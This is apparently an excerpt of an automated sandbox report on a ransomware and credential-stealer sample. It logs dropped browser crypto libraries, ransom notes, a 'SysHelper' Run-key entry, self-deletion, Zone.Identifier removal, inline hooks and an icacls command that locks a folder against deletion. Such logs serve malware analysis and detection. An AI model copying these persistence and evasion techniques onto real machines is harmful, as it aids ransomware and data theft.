            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqlm[1].dllJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\71C9.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dllJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gtdiratJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeFile created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gtdiratJump to dropped file
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeFile created: C:\Users\user\_README.txtJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeFile created: C:\_README.txt
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeFile created: C:\$WinREAgent\_README.txt
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeFile created: C:\$WinREAgent\Scratch\_README.txt
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Deletes itself after installation
            Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\6uvlpqsj4e.exeJump to behavior
            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\gtdirat:Zone.Identifier read attributes | deleteJump to behavior
            Overwrites code with unconditional jumps - possibly settings hooks in foreign process
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeMemory written: PID: 5352 base: 1420005 value: E9 2B BA F2 75
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeMemory written: PID: 5352 base: 7734BA30 value: E9 DA 45 0D 8A
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeMemory written: PID: 5352 base: 1430008 value: E9 8B 8E F6 75
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeMemory written: PID: 5352 base: 77398E90 value: E9 80 71 09 8A
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeMemory written: PID: 5352 base: 2CE0005 value: E9 8B 4D C5 73
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeMemory written: PID: 5352 base: 76934D90 value: E9 7A B2 3A 8C
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeMemory written: PID: 5352 base: 2D00005 value: E9 EB EB C4 73
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeMemory written: PID: 5352 base: 7694EBF0 value: E9 1A 14 3B 8C
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeMemory written: PID: 5352 base: 2D10005 value: E9 8B 8A C1 72
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeMemory written: PID: 5352 base: 75928A90 value: E9 7A 75 3E 8D
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeMemory written: PID: 5352 base: 2D20005 value: E9 2B 02 C3 72
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeMemory written: PID: 5352 base: 75950230 value: E9 DA FD 3C 8D
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_00403CF1 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_00403CF1
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce" /deny *S-1-1-0:(OI)(CI)(DE,DC)
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
